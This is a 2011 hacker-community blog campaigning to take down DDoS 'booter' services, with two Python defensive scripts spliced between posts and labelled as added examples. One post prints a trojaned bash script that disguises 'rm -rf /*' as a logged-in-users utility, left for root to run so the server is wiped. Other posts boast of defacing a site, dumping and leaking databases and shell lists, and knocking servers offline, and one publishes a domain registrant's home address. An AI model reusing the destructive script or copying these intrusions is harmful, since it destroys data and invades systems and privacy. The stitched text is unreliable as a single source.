Tuesday, November 22, 2011

A plague on the internet


Haha, you see what I did there? Plague on the internet? Oh right, I haven't told you what booter it is, yet.

Today, Plague Booter went down.

Haha, you see now? Funny, right? No? :( You have no sense of humor.

Anyway, an anonymous supporter contacted us today. You may have heard of him. He goes by Codevade. I was joking about the anonymous part.


Just so you can click it more easily, here's that link.

Most of that shit isn't even shells. Look at it. He's got pastes and just random sites in there to make it look like he's got more shells than he does. What the hell?

Anyway, enjoy, and don't forget to thank Codevade!

Wednesday, November 9, 2011

Hello there, Green Booter


Today, I received a communique from a very nice anonymous supporter of ours.

He has informed me of greenbooter's URL. Not very hidden. It's as if they WANT to be found, so someone can shut them down and the owner can blame Booter Down and just run off with his customers' money.

Look how simple it is: http://greenbooter.com

Anyway, here's their list of shells. Do enjoy.
*Link Removed*

If your server(s) is/are on this list, you may want to look into finding out how he got in and patch up that hole.

Most likely it will be from a WebDAV exploit where you haven't changed the default user/pass.

Just skimming through his list, I see he adds multiple shells from the same server to make it seem like he has more shells.

Ripping off his customers

Here is his database: *Link Removed*

Do enjoy.
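
For an administrator whose server turns up on a list like this, the web server's access log is the first place to look for how files arrived under /webdav/. The sketch below is an added example, not part of the original post: it assumes Apache combined log format and a /webdav/ path prefix, and the function name and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache combined log format: host ident user [time] "METHOD path proto" status ...
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

def find_webdav_writes(lines, dav_prefix="/webdav/"):
    """Return {(client_ip, auth_user): [(kind, path), ...]} for successful
    WebDAV writes that could have placed a server-side script."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m or not m["status"].startswith("2"):
            continue  # unparsable line, or the request was refused
        path = m["path"].split("?", 1)[0]
        if not path.lower().startswith(dav_prefix):
            continue
        if m["method"] == "PUT" and SCRIPT_EXT.search(path):
            kind = "script_upload"
        elif m["method"] in ("MOVE", "COPY"):
            # The target name travels in the Destination header, which the
            # default log format omits, so every rename needs a manual look.
            kind = "rename_destination_unlogged"
        else:
            continue
        hits[(m["ip"], m["user"])].append((kind, path))
    return dict(hits)

# Constructed sample lines (documentation IP ranges, made-up user names).
SAMPLE = [
    '198.51.100.7 - davuser [09/Nov/2011:10:01:02 +0000] "PUT /webdav/a1.php HTTP/1.1" 201 312 "-" "-"',
    '198.51.100.7 - davuser [09/Nov/2011:10:01:05 +0000] "PUT /webdav/a2.php HTTP/1.1" 201 312 "-" "-"',
    '198.51.100.7 - davuser [09/Nov/2011:10:01:09 +0000] "MOVE /webdav/notes.txt HTTP/1.1" 201 - "-" "-"',
    '192.0.2.10 - - [09/Nov/2011:10:02:00 +0000] "PUT /webdav/x.php HTTP/1.1" 401 401 "-" "-"',
    '192.0.2.10 - - [09/Nov/2011:10:03:00 +0000] "GET /webdav/a1.php HTTP/1.1" 200 15 "-" "-"',
    '203.0.113.5 - editor [09/Nov/2011:10:04:00 +0000] "PUT /webdav/report.docx HTTP/1.1" 201 900 "-" "-"',
]

if __name__ == "__main__":
    for (ip, user), events in find_webdav_writes(SAMPLE).items():
        print(ip, user, events)
```

The authenticated user name on each hit shows which WebDAV account did the writing, which is the account whose password needs changing first.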

Sunday, October 16, 2011

You asked for it, here it is!

Lately we've been pretty inactive. I know... I apologize... Personally... I blame BV1. You should too! Or at least blame anyone that isn't me... I hate the blame :(

But have no fear! We're going to start working on some shit this week. We'll get back to reporting booters, and we're going to start compiling a new list of booters and hosts supporting these booters.

Also, we now have an official IRC channel, since a few of you demanded it.

To access it, irc.hackt.org #booterdown

Hope to see you there!

Tuesday, September 6, 2011

A look into Legion Booter


The other day, a new booter hit the market. They called themselves Legion Booter.

Hell, you don't even need to get into their cPanel or anything to get their database, as long as they've created a backup. Some pro security right here.




I also decided that I'd do a little bit of defacing. You know, cause we're big heckers.

Hopefully he's learned his lesson. Have a nice day.

Saturday, September 3, 2011

Booter List Updated!

This morning I went ahead and removed all the dead links from the booter list on the side, and added the live ones. I'm sure I've missed some still, so if you got some links, post 'em. BV1 and I will add them today.

Any booter name with a (?) beside it means that I wasn't sure about the name of it.

BV1 said he'll also be making a list of approved booters.

I may make a list of dead links, just to make sure that they can't come back with old links thinking we've forgotten about that URL.

Happy reporting!

Monday, August 29, 2011

Need Links to Booters using Prodigy's Source

May know of a way to exploit them, just need booters to test on.
Post links in comments.

Take em down

Modders Heaven Booter.
They are on a new host, they used to be on modders-heaven.com, now I believe they are here: http://173.212.200.164/login.php

They claim it's old.. so try to find out if it is. CoderCopy and paster gets mad on his thread here:

http://www.hackforums.net/showthread.php?tid=1664610

Sunday, August 28, 2011

Credits: Orgy



This is a script you can use to possibly get the IP of a CloudFlare protected server. It won't work EVERY time, but it will most of the time.

Friday, August 26, 2011

NozHost no longer hosting booters

I guess some of you decided to attack some booters hosted by NozHost. Keep in mind that we don't condone DDoS attacks, but instead prefer to take the legal route. As in reporting the illegal material to the hosts.
However, if it was indeed one of you, what's done is done, and now NozHost will no longer host any booters. Instead it turns out they'll be suspending them immediately, so that's a win I suppose. :)




In other news, you may have noticed 0xE9 is now a Contributor. You've probably heard of him. If you haven't, he's a friend of mine and BV1's. He's going to be having fun with some of the "PuTTY" Booters.

Also, 0xE9 suggested we create a forum. If we do this, we'll need some actual hosting and we'll be vulnerable to DDoS attacks, so I don't know if we should do this. However, I have a pretty good setup going on another of my hosts, but to finish making it as DDoS proof as possible, it'll cost me a decent chunk of change monthly. What do you guys think?


-Orgy

More "putty booter" kids released back into the wild

Not a large HF booter but it's a pretty funny story anyway. While I was looking for a way to get root on this "putty booter", (owner is using copy and pasted perl script), so I could "rm -rf /*" I noticed the admin was unable to use bash well so he had downloaded the following script to list all logged in users:

#!/bin/bash
clear
echo "+==================================+"
echo "+--------------------------------------------------------------------+"
echo "+---------------------------whos on-----------------------------+"
echo "+--------------------------------------------------------------------+"
echo "+--------------------------------------------------------------------+"
w
echo "press any key when done"
read

It was set to read only so all that was needed was me to rm -rf the script then replace it with my own version:

#!/bin/bash
clear
echo "+================================+"
echo "+-----------------------lol heckers lol---------------------+"
echo "+----------- XBL RUNNING CANCELED------------+"
echo "+-------------8==============D O:--------------+"
echo "+---------------------------------------------------------------+"
wall I been hecked
rm -rf /*
echo "press any key when done"
read

Now all that was left to do was wait for the root user to run my script and lulz could be had as the silly message was broadcast and server reformatted.
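
The read-only mode on that script gave no protection, because removing and recreating a file is governed by write access to its directory, not to the file. The following audit is an added example, not code from the original post: the function name is hypothetical, it checks plain Unix mode bits and ownership only (no ACLs), and it treats any group-writable entry as a finding.

```python
import os
import stat
import sys

def audit_replaceable(path, trusted_uids=frozenset({0})):
    """Return [(path, reason)] for every place where a user outside
    trusted_uids could swap out `path` before a privileged user runs it.

    Walks the file and every ancestor directory up to the filesystem root.
    """
    findings = []
    current = os.path.realpath(path)   # audit what would really be executed
    is_target = True
    while True:
        st = os.stat(current)
        loose = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
        if st.st_uid not in trusted_uids:
            # An owner can always chmod the entry back to writable.
            findings.append((current, "owned by untrusted uid %d" % st.st_uid))
        elif is_target and loose:
            findings.append((current, "file is group/world-writable"))
        elif not is_target and loose and not st.st_mode & stat.S_ISVTX:
            # The sticky bit (as on /tmp) stops users removing or renaming
            # entries they do not own, so a sticky directory passes here.
            findings.append(
                (current, "directory is group/world-writable, no sticky bit"))
        parent = os.path.dirname(current)
        if parent == current:          # reached the filesystem root
            return findings
        current, is_target = parent, False

if __name__ == "__main__":
    # Usage: python audit.py /path/to/script-run-by-root
    for where, why in audit_replaceable(sys.argv[1]):
        print("%s: %s" % (where, why))
```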






Thursday, August 25, 2011

Where's RileyK20 Booter?

Apparently they had 2,000 shells. That's what their panel said.

Well, after removing all of the DUPLICATE shells, turns out they only had about 500. They added the same shells 4 times each, rofl. How terrible.

Here they are.
http://pastebin.com/y6aDgqwh

Enjoy checking how many of them are actually alive. I haven't checked myself, but turns out it's about ~50

-Orgy

EDIT: Since some people seem to doubt the amount of duplicate shells in their list, here's the completely unmodified list.
http://pastebin.com/HcEZHQpa

Wednesday, August 24, 2011

Progress Report

With the site launching a bit prematurely, I was afraid that we gave Shell Booter owners too much time to prep and protect their Booters, but after witnessing what I've seen over the last couple days there is no doubt in my mind that we were ready. It's amazing to see a lot of the HF members and friends who I haven't seen actively participate in anything recently, actually giving us a hand and doing some awesome work.

With only three days of work behind us so far, we've made some tremendous progress. HackForum's Marketplace Discussion is a mess right now with Shell Booter owners panicking. These crooks know that we're destroying their scams for easy money, and they can't take it. They are doing whatever they can to try and stop us, but their efforts are futile. Make sure you show the community who the better side is. We have maturity, seniority, skill, and overall determination, and those are all qualities the opposition is missing.


Here are the current lists that I've compiled:

Living Booters (Please help this list grow):

Dead Booters:
Cry Booter - http://crybooter.info
ddos em' - http://ddosem.net/
Exclusive Booter - http://exlusive-booter.tk/
Flatline Booter - http://flatlinebooter.co.cc
freebshellbooter - http://freebshellbooter.co.cc
Frost Booter - http://frostbooter.co.cc
Ghost Booter - http://www.hack-bb.com/
Hacker Pro Booter - http://hackerprobooter.com
iMurder Boot - http://imurderboot.co.cc
Insidious Booter - http://insidiousbooter.tk
Intense Booter - http://theglobalgamerz.com
ISP Booter - http://ispbooter.info
Ninja Booter - http://ninjabooter.net
Pacman Booter - http://pacmanbooter.com/
Power Booter - http://powerbooter.info
Sandman Booter - http://sandmanbooter.co.cc
Se7en Booter - http://se7enbooter.com
Sh3ll Booter - http://sh3llb00t.co.cc
Swat Booter - http://swatbooter.info
Taylor Gang Booter - http://taylorgangboots.co.cc
xblteddybooter - http://xblteddybooter.info
XR Booter – http://arronxr.net

If my count is correct, that is 38 dead booters, and that is only what I personally know of. You guys have done a great job working together to destroy this common problem. We have more work to do, but before long we'll have an Internet free of this malicious bullshit.

Tuesday, August 23, 2011

Exclusive Booter wants war

Rather than proving they're legit, they've decided they want to trash and slander and threaten and war, so okay.

Let's war.

Anyone got Exclusive Booter's latest link? :)

EDIT: Hell, here in this screenshot you can see how skiddy they are. They haven't the slightest clue about networking, yet they run a DDoS tool.





First of all, they think they can IP Spoof when they're using a web server. Completely clueless how the TCP handshake works.

Secondly, they think that if they rent a dedicated server or a VPS that they suddenly don't have to obey any laws.

... I am so disappoint.

HF States they will Remain Neutral


This is what had me worried for a while. With our main intention being cleaning up the marketplace, I always feared my actions would get me removed from that which we are fighting for. This helps put my mind at rest, and will allow me to be more confident with our actions.

Everyone needs to remember that HF is meant to be a safe place, and that any abusive activity should be kept away from there at all times. We'll continue onward as planned, our actions won't change, just make sure you keep anything malicious off of HF.

Monday, August 22, 2011

More shell booters down

So, today WiFi decided to make a thread about Booter Down. You can view it here. He lied about quite a few things, such as me being the creator of Booter Down. I'm not, BV1 is. I just contribute by posting every so often.

A few people mentioned that WiFi was knowingly hosting shell booters. A few hours later, someone (I'll let them remain anonymous, as per their request) sent me this screenshot.

So there goes a reseller that allows the hosting of shell booters, as well as the shell booters it was hosting.



Legend

First, check out everyone doing work here:

http://www.booterdown.com/2011/08/lets-see-others-getting-in-on-action.html#comments


Then check out the PM I got on HF stating the following:


Apparently, all of these were on attheckers reseller account.








Props to NoFear1999

Sunday, August 21, 2011

Let's see others getting in on the action!

On this blog post, we won't say much. We just want to see screenshots of you guys sending in abuse reports to hosts that are hosting shitty booters. Leave the screenshots in the comments.

If the booter is hiding behind CloudFlare, just send a message to CloudFlare, they'll happily tell you the real IP so you can report them! Message them here.

Regarding the list on the side

People keep asking me about the list of booters on the side. I personally do not control the list at all. I cannot add sites to it, nor can I remove them. If you want information regarding the list, you need to speak to BV1.

Furthermore, as I've stated before, I personally do not engage in "taking down" the booters. All I do is provide BV1 with information that would be beneficial to his cause, and only about booters that I feel deserve it. One of those booters being xBootem, whose owner lies to his customers and is clearly completely incompetent.

Also, I'd like to thank xBootem. They've made a thread on HackForums today (currently visible here, but will probably be removed by staff by the end of the night) that has gotten Booter Down some serious recognition. Thanks, xBootem!

That is all.
-Orgy

xBootem' On Deck

Booter: xBootem'
URL: http://thegreatgriz.com/site/login.php
IP Address: 96.9.156.198
Host: http://www.hosting24.com
Registrant:
   Michael McMorrow
   640 Richmond Beach Rd
   #101
   Shoreline, Washington 98177
   United States

Motivation:



My Response:



It's a nice thing when you run into hosts that are cooperative and helpful. While an immediate suspension is preferred, I'm more than happy with this as it means it's one less booter I have to worry about for today.


Please notify me when xBootem' obtains new hosting.

For the luls

Make sure you know who you're buying from on HF. Some of our users are... yeah...

Saturday, August 20, 2011

Help get things started




Help us compile a list of as many Shell Booters as possible.
We are specifically looking for URLs to Booters.
If you have any, post them in a comment below and
we will do what we can to make sure they are downed.



In other news, new graphics:


  Made by Bannedshit

Joining in on the fun

Today, Lith made a thread about Booter Down on HackForums (viewable here). We urge you all to do the same. Since the thread, a few people have already contacted me about wanting to help our cause.

Want to help as well? Make threads, advertise this blog, and of course, take down the booters. Even doing something as simple as adding an advertisement in your signature on forums. There's even an image already done up (by Lith I'm assuming, since he's the first one I've seen using it.)
Want to put it in your signature? Here's the code:
[url=www.booterdown.com][img]http://i.imgur.com/qSsAi.png[/img][/url]

Now if you really want to join in on the fun, start reporting the booters to their hosts. Compile screenshots, videos, whatever you can to prove that they're malicious DDoS tools. They're all trying to hide under the guise of being "Network Stress Testing Tools," but this won't actually hold up. That's just something I pulled out of my head a year ago to get accepted into FastSpring. Hosts won't actually accept this. If we all pitch in to get these booters suspended and everything else, eventually the owners will be so overwhelmed that they'll give up entirely.

Do your part! Rid the community of this garbage.

Friday, August 19, 2011

Multiple Booters Dropped

While Orgy was doing work as usual, he informed me of quite the jackpot to cap off a good night.



http://happyhacks.com/booter/



After being shown that, we took a look at http://www.sdkexpert.net/booter_tracker/ and sure enough it looked like some sort of domain locking system for whatever booter source (Need a name). Anyways, a quick shot to that server and we can expect downtime to multiple booters.



http://www.sdkexpert.net/booter_tracker/?s=happyhacks.com/booter/



http://www.sdkexpert.net/


Anyways, so far from what I can confirm this took down Happy Booter, Flex Booter, and MangoGuava. Please let me know if this affects any other booters.

A sad day for attbooter

Booter: attbooter
Domain(s): attbooter.com | attbooter.info
IP: 46.105.241.190
Shells: http://pastebin.com/mHw6PGPb (Less than 500 work)

More information on the hit:
http://bv1.us/att.html



For the luls



Wednesday, August 17, 2011

Shell Booters

Shell Booters, unarguably the favorite tool used by the skid, have been the downfall of low leveled Hacking communities for some time now. Revolutionized by Orgy roughly 16 months ago, Shell Booters started off as an interesting tool that many kids began to use as they weren't able to set up their own nets, mainly due to their own stupidity. Things started off strong. There were a couple of Shell Booters on the market; all had a fair, but stern price. Each had a solid customer base, and while still looked down upon, the community accepted these booters.

Flash forward 6 months and the outbreak begins. Sources are leaked, shells became easily obtainable, and the infection spread. Soon you couldn't view a marketplace without seeing a massive amount of booters being sold for next to nothing, and only more were being made. Now there are 50+ booters on HackForums alone, and only more are being made.